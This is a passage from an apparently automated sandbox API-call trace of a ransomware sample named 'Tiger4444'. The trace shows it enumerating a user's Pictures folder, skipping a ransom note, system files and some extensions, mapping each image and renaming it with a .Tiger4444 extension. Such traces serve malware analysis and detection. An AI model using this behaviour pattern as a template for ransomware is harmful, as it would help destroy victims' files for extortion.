param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\3WV0Ls jiLUSjUUco.gif.Tiger4444") returned 56 [0045.498] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\3WV0Ls jiLUSjUUco.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\3wv0ls jilusjuuco.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\3WV0Ls jiLUSjUUco.gif.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\3wv0ls jilusjuuco.gif.tiger4444"), dwFlags=0x1) returned 1 [0045.498] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=70448 | out: Addend=0xc6f980) returned 16645696 [0045.498] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4477 [0045.498] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa1d9f60, ftCreationTime.dwHighDateTime=0x1d4c583, ftLastAccessTime.dwLowDateTime=0xe358c70, ftLastAccessTime.dwHighDateTime=0x1d4c60a, ftLastWriteTime.dwLowDateTime=0xe358c70, ftLastWriteTime.dwHighDateTime=0x1d4c60a, nFileSizeHigh=0x0, nFileSizeLow=0xea3d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5_uNa_SA36f77jy3w2Gv.png", cAlternateFileName="5_UNA_~1.PNG")) returned 1 [0045.498] lstrcmpiW (lpString1="5_uNa_SA36f77jy3w2Gv.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.498] lstrcmpiW (lpString1="5_uNa_SA36f77jy3w2Gv.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.498] lstrcmpiW (lpString1="5_uNa_SA36f77jy3w2Gv.png", lpString2="Tiger4444.exe") returned -1 [0045.498] lstrcmpiW (lpString1="5_uNa_SA36f77jy3w2Gv.png", lpString2=".") returned 1 [0045.498] lstrcmpiW (lpString1="5_uNa_SA36f77jy3w2Gv.png", lpString2="..") returned 1 [0045.498] lstrcmpiW (lpString1="5_uNa_SA36f77jy3w2Gv.png", lpString2="windows") returned -1 [0045.499] lstrcmpiW (lpString1="5_uNa_SA36f77jy3w2Gv.png", lpString2="bootmgr") returned -1 [0045.499] lstrcmpiW (lpString1="5_uNa_SA36f77jy3w2Gv.png", lpString2="pagefile.sys") returned -1 [0045.499] lstrcmpiW (lpString1="5_uNa_SA36f77jy3w2Gv.png", lpString2="boot") returned -1 [0045.499] lstrcmpiW (lpString1="5_uNa_SA36f77jy3w2Gv.png", lpString2="ids.txt") returned -1 [0045.499] lstrcmpiW (lpString1="5_uNa_SA36f77jy3w2Gv.png", lpString2="NTUSER.DAT") returned -1 [0045.499] lstrcpyW (in: lpString1=0x30aeada, lpString2="5_uNa_SA36f77jy3w2Gv.png" | out: lpString1="5_uNa_SA36f77jy3w2Gv.png") returned="5_uNa_SA36f77jy3w2Gv.png" [0045.499] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5_uNa_SA36f77jy3w2Gv.png", dwFileAttributes=0x0) returned 1 [0045.499] lstrlenW (lpString="5_uNa_SA36f77jy3w2Gv.png") returned 24 [0045.499] lstrlenW (lpString="Tiger4444") returned 9 [0045.499] lstrcmpiW (lpString1="3w2Gv.png", lpString2="Tiger4444") returned -1 [0045.499] lstrlenW (lpString=".dll") returned 4 [0045.499] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0045.499] lstrlenW (lpString=".lnk") returned 4 [0045.499] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0045.499] lstrlenW (lpString=".ini") returned 4 [0045.499] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0045.499] lstrlenW (lpString=".sys") returned 4 [0045.499] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0045.499] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5_uNa_SA36f77jy3w2Gv.png" (normalized: "c:\\users\\fd1hvy\\pictures\\5_una_sa36f77jy3w2gv.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.499] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.499] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13695238862) returned 1 [0045.499] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=59965) returned 1 [0045.499] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0045.499] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0045.499] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xed40, lpName=0x0) returned 0x2c8 [0045.500] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xed40) returned 0xbe0000 [0045.501] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.501] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.501] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.501] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0045.501] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.501] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0045.501] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.501] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.501] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13695427966) returned 1 [0045.501] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0045.501] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0045.501] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.502] CloseHandle (hObject=0x2c8) returned 1 [0045.502] CloseHandle (hObject=0x260) returned 1 [0045.505] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\5_uNa_SA36f77jy3w2Gv.png.Tiger4444") returned 59 [0045.505] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\5_uNa_SA36f77jy3w2Gv.png" (normalized: "c:\\users\\fd1hvy\\pictures\\5_una_sa36f77jy3w2gv.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\5_uNa_SA36f77jy3w2Gv.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\5_una_sa36f77jy3w2gv.png.tiger4444"), dwFlags=0x1) returned 1 [0045.505] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=59968 | out: Addend=0xc6f980) returned 16716144 [0045.506] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4479 [0045.506] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff528870, ftCreationTime.dwHighDateTime=0x1d4d207, ftLastAccessTime.dwLowDateTime=0xde21f6c0, ftLastAccessTime.dwHighDateTime=0x1d4ce8f, ftLastWriteTime.dwLowDateTime=0xde21f6c0, ftLastWriteTime.dwHighDateTime=0x1d4ce8f, nFileSizeHigh=0x0, nFileSizeLow=0x15465, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6iyFgn9SrZHQ KGFU.gif", cAlternateFileName="6IYFGN~1.GIF")) returned 1 [0045.506] lstrcmpiW (lpString1="6iyFgn9SrZHQ KGFU.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.506] lstrcmpiW (lpString1="6iyFgn9SrZHQ KGFU.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.506] lstrcmpiW (lpString1="6iyFgn9SrZHQ KGFU.gif", lpString2="Tiger4444.exe") returned -1 [0045.506] lstrcmpiW (lpString1="6iyFgn9SrZHQ KGFU.gif", lpString2=".") returned 1 [0045.506] lstrcmpiW (lpString1="6iyFgn9SrZHQ KGFU.gif", lpString2="..") returned 1 [0045.506] lstrcmpiW (lpString1="6iyFgn9SrZHQ KGFU.gif", lpString2="windows") returned -1 [0045.506] lstrcmpiW (lpString1="6iyFgn9SrZHQ KGFU.gif", lpString2="bootmgr") returned -1 [0045.506] lstrcmpiW (lpString1="6iyFgn9SrZHQ KGFU.gif", lpString2="pagefile.sys") returned -1 [0045.506] lstrcmpiW (lpString1="6iyFgn9SrZHQ KGFU.gif", lpString2="boot") returned -1 [0045.506] lstrcmpiW (lpString1="6iyFgn9SrZHQ KGFU.gif", lpString2="ids.txt") returned -1 [0045.506] lstrcmpiW (lpString1="6iyFgn9SrZHQ KGFU.gif", lpString2="NTUSER.DAT") returned -1 [0045.506] lstrcpyW (in: lpString1=0x30aeada, lpString2="6iyFgn9SrZHQ KGFU.gif" | out: lpString1="6iyFgn9SrZHQ KGFU.gif") returned="6iyFgn9SrZHQ KGFU.gif" [0045.506] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\6iyFgn9SrZHQ KGFU.gif", dwFileAttributes=0x0) returned 1 [0045.506] lstrlenW (lpString="6iyFgn9SrZHQ KGFU.gif") returned 21 [0045.506] lstrlenW (lpString="Tiger4444") returned 9 [0045.506] lstrcmpiW (lpString1=" KGFU.gif", lpString2="Tiger4444") returned -1 [0045.506] lstrlenW (lpString=".dll") returned 4 [0045.506] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0045.506] lstrlenW (lpString=".lnk") returned 4 [0045.506] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0045.506] lstrlenW (lpString=".ini") returned 4 [0045.506] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0045.506] lstrlenW (lpString=".sys") returned 4 [0045.506] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0045.507] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\6iyFgn9SrZHQ KGFU.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\6iyfgn9srzhq kgfu.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.507] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.507] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13695978888) returned 1 [0045.507] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=87141) returned 1 [0045.507] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0045.507] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0045.507] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15770, lpName=0x0) returned 0x2c8 [0045.507] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15770) returned 0xbe0000 [0045.509] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.509] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0045.509] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.509] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.509] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.509] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.509] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.509] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0045.509] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13696263757) returned 1 [0045.510] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0045.510] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0045.510] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.511] CloseHandle (hObject=0x2c8) returned 1 [0045.511] CloseHandle (hObject=0x260) returned 1 [0045.514] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\6iyFgn9SrZHQ KGFU.gif.Tiger4444") returned 56 [0045.514] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\6iyFgn9SrZHQ KGFU.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\6iyfgn9srzhq kgfu.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\6iyFgn9SrZHQ KGFU.gif.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\6iyfgn9srzhq kgfu.gif.tiger4444"), dwFlags=0x1) returned 1 [0045.514] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=87152 | out: Addend=0xc6f980) returned 16776112 [0045.514] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4480 [0045.514] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5fb140, ftCreationTime.dwHighDateTime=0x1d4c8eb, ftLastAccessTime.dwLowDateTime=0x5c9f6fe0, ftLastAccessTime.dwHighDateTime=0x1d4d201, ftLastWriteTime.dwLowDateTime=0x5c9f6fe0, ftLastWriteTime.dwHighDateTime=0x1d4d201, nFileSizeHigh=0x0, nFileSizeLow=0x207c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8IrExsVsSnK3.jpg", cAlternateFileName="8IREXS~1.JPG")) returned 1 [0045.514] lstrcmpiW (lpString1="8IrExsVsSnK3.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.514] lstrcmpiW (lpString1="8IrExsVsSnK3.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.514] lstrcmpiW (lpString1="8IrExsVsSnK3.jpg", lpString2="Tiger4444.exe") returned -1 [0045.515] lstrcmpiW (lpString1="8IrExsVsSnK3.jpg", lpString2=".") returned 1 [0045.515] lstrcmpiW (lpString1="8IrExsVsSnK3.jpg", lpString2="..") returned 1 [0045.515] lstrcmpiW (lpString1="8IrExsVsSnK3.jpg", lpString2="windows") returned -1 [0045.515] lstrcmpiW (lpString1="8IrExsVsSnK3.jpg", lpString2="bootmgr") returned -1 [0045.515] lstrcmpiW (lpString1="8IrExsVsSnK3.jpg", lpString2="pagefile.sys") returned -1 [0045.515] lstrcmpiW (lpString1="8IrExsVsSnK3.jpg", lpString2="boot") returned -1 [0045.515] lstrcmpiW (lpString1="8IrExsVsSnK3.jpg", lpString2="ids.txt") returned -1 [0045.515] lstrcmpiW (lpString1="8IrExsVsSnK3.jpg", lpString2="NTUSER.DAT") returned -1 [0045.515] lstrcpyW (in: lpString1=0x30aeada, lpString2="8IrExsVsSnK3.jpg" | out: lpString1="8IrExsVsSnK3.jpg") returned="8IrExsVsSnK3.jpg" [0045.515] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\8IrExsVsSnK3.jpg", dwFileAttributes=0x0) returned 1 [0045.515] lstrlenW (lpString="8IrExsVsSnK3.jpg") returned 16 [0045.515] lstrlenW (lpString="Tiger4444") returned 9 [0045.515] lstrcmpiW (lpString1="sSnK3.jpg", lpString2="Tiger4444") returned -1 [0045.515] lstrlenW (lpString=".dll") returned 4 [0045.515] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0045.515] lstrlenW (lpString=".lnk") returned 4 [0045.515] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0045.515] lstrlenW (lpString=".ini") returned 4 [0045.515] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0045.515] lstrlenW (lpString=".sys") returned 4 [0045.515] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0045.515] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\8IrExsVsSnK3.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\8irexsvssnk3.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.516] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.516] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13696868363) returned 1 [0045.516] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=8316) returned 1 [0045.516] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0045.516] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0045.516] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2380, lpName=0x0) returned 0x2c8 [0045.516] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2380) returned 0xbe0000 [0045.516] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.516] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0045.516] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.516] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0045.516] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.517] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0045.517] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.517] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0045.517] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13696994541) returned 1 [0045.517] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0045.517] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0045.517] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.517] CloseHandle (hObject=0x2c8) returned 1 [0045.517] CloseHandle (hObject=0x260) returned 1 [0045.519] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\8IrExsVsSnK3.jpg.Tiger4444") returned 51 [0045.519] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\8IrExsVsSnK3.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\8irexsvssnk3.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\8IrExsVsSnK3.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\8irexsvssnk3.jpg.tiger4444"), dwFlags=0x1) returned 1 [0045.519] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=8320 | out: Addend=0xc6f980) returned 16863264 [0045.519] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4482 [0045.519] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ba2c40, ftCreationTime.dwHighDateTime=0x1d4ccaa, ftLastAccessTime.dwLowDateTime=0xf5d84230, ftLastAccessTime.dwHighDateTime=0x1d4cd52, ftLastWriteTime.dwLowDateTime=0xf5d84230, ftLastWriteTime.dwHighDateTime=0x1d4cd52, nFileSizeHigh=0x0, nFileSizeLow=0xbd0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8ZHyFqvR363JEtV.png", cAlternateFileName="8ZHYFQ~1.PNG")) returned 1 [0045.520] lstrcmpiW (lpString1="8ZHyFqvR363JEtV.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.520] lstrcmpiW (lpString1="8ZHyFqvR363JEtV.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.520] lstrcmpiW (lpString1="8ZHyFqvR363JEtV.png", lpString2="Tiger4444.exe") returned -1 [0045.520] lstrcmpiW (lpString1="8ZHyFqvR363JEtV.png", lpString2=".") returned 1 [0045.520] lstrcmpiW (lpString1="8ZHyFqvR363JEtV.png", lpString2="..") returned 1 [0045.520] lstrcmpiW (lpString1="8ZHyFqvR363JEtV.png", lpString2="windows") returned -1 [0045.520] lstrcmpiW (lpString1="8ZHyFqvR363JEtV.png", lpString2="bootmgr") returned -1 [0045.520] lstrcmpiW (lpString1="8ZHyFqvR363JEtV.png", lpString2="pagefile.sys") returned -1 [0045.520] lstrcmpiW (lpString1="8ZHyFqvR363JEtV.png", lpString2="boot") returned -1 [0045.520] lstrcmpiW (lpString1="8ZHyFqvR363JEtV.png", lpString2="ids.txt") returned -1 [0045.520] lstrcmpiW (lpString1="8ZHyFqvR363JEtV.png", lpString2="NTUSER.DAT") returned -1 [0045.520] lstrcpyW (in: lpString1=0x30aeada, lpString2="8ZHyFqvR363JEtV.png" | out: lpString1="8ZHyFqvR363JEtV.png") returned="8ZHyFqvR363JEtV.png" [0045.520] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\8ZHyFqvR363JEtV.png", dwFileAttributes=0x0) returned 1 [0045.520] lstrlenW (lpString="8ZHyFqvR363JEtV.png") returned 19 [0045.520] lstrlenW (lpString="Tiger4444") returned 9 [0045.520] lstrcmpiW (lpString1="3JEtV.png", lpString2="Tiger4444") returned -1 [0045.520] lstrlenW (lpString=".dll") returned 4 [0045.520] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0045.520] lstrlenW (lpString=".lnk") returned 4 [0045.520] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0045.520] lstrlenW (lpString=".ini") returned 4 [0045.520] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0045.520] lstrlenW (lpString=".sys") returned 4 [0045.520] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0045.520] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\8ZHyFqvR363JEtV.png" (normalized: "c:\\users\\fd1hvy\\pictures\\8zhyfqvr363jetv.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.520] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.520] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13697357337) returned 1 [0045.521] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=48398) returned 1 [0045.521] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0045.521] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0045.521] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc010, lpName=0x0) returned 0x2c8 [0045.521] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc010) returned 0xbe0000 [0045.522] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.522] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0045.522] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.522] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.522] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.523] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.523] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.523] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0045.523] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13697573302) returned 1 [0045.523] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0045.523] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0045.523] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.523] CloseHandle (hObject=0x2c8) returned 1 [0045.523] CloseHandle (hObject=0x260) returned 1 [0045.525] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\8ZHyFqvR363JEtV.png.Tiger4444") returned 54 [0045.525] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\8ZHyFqvR363JEtV.png" (normalized: "c:\\users\\fd1hvy\\pictures\\8zhyfqvr363jetv.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\8ZHyFqvR363JEtV.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\8zhyfqvr363jetv.png.tiger4444"), dwFlags=0x1) returned 1 [0045.526] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=48400 | out: Addend=0xc6f980) returned 16871584 [0045.526] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4483 [0045.526] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x316dfd30, ftCreationTime.dwHighDateTime=0x1d4d1b3, ftLastAccessTime.dwLowDateTime=0xa059a90, ftLastAccessTime.dwHighDateTime=0x1d4d501, ftLastWriteTime.dwLowDateTime=0xa059a90, ftLastWriteTime.dwHighDateTime=0x1d4d501, nFileSizeHigh=0x0, nFileSizeLow=0xe5c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C876_Q.gif", cAlternateFileName="")) returned 1 [0045.526] lstrcmpiW (lpString1="C876_Q.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.526] lstrcmpiW (lpString1="C876_Q.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.526] lstrcmpiW (lpString1="C876_Q.gif", lpString2="Tiger4444.exe") returned -1 [0045.526] lstrcmpiW (lpString1="C876_Q.gif", lpString2=".") returned 1 [0045.526] lstrcmpiW (lpString1="C876_Q.gif", lpString2="..") returned 1 [0045.526] lstrcmpiW (lpString1="C876_Q.gif", lpString2="windows") returned -1 [0045.526] lstrcmpiW (lpString1="C876_Q.gif", lpString2="bootmgr") returned 1 [0045.526] lstrcmpiW (lpString1="C876_Q.gif", lpString2="pagefile.sys") returned -1 [0045.526] lstrcmpiW (lpString1="C876_Q.gif", lpString2="boot") returned 1 [0045.526] lstrcmpiW 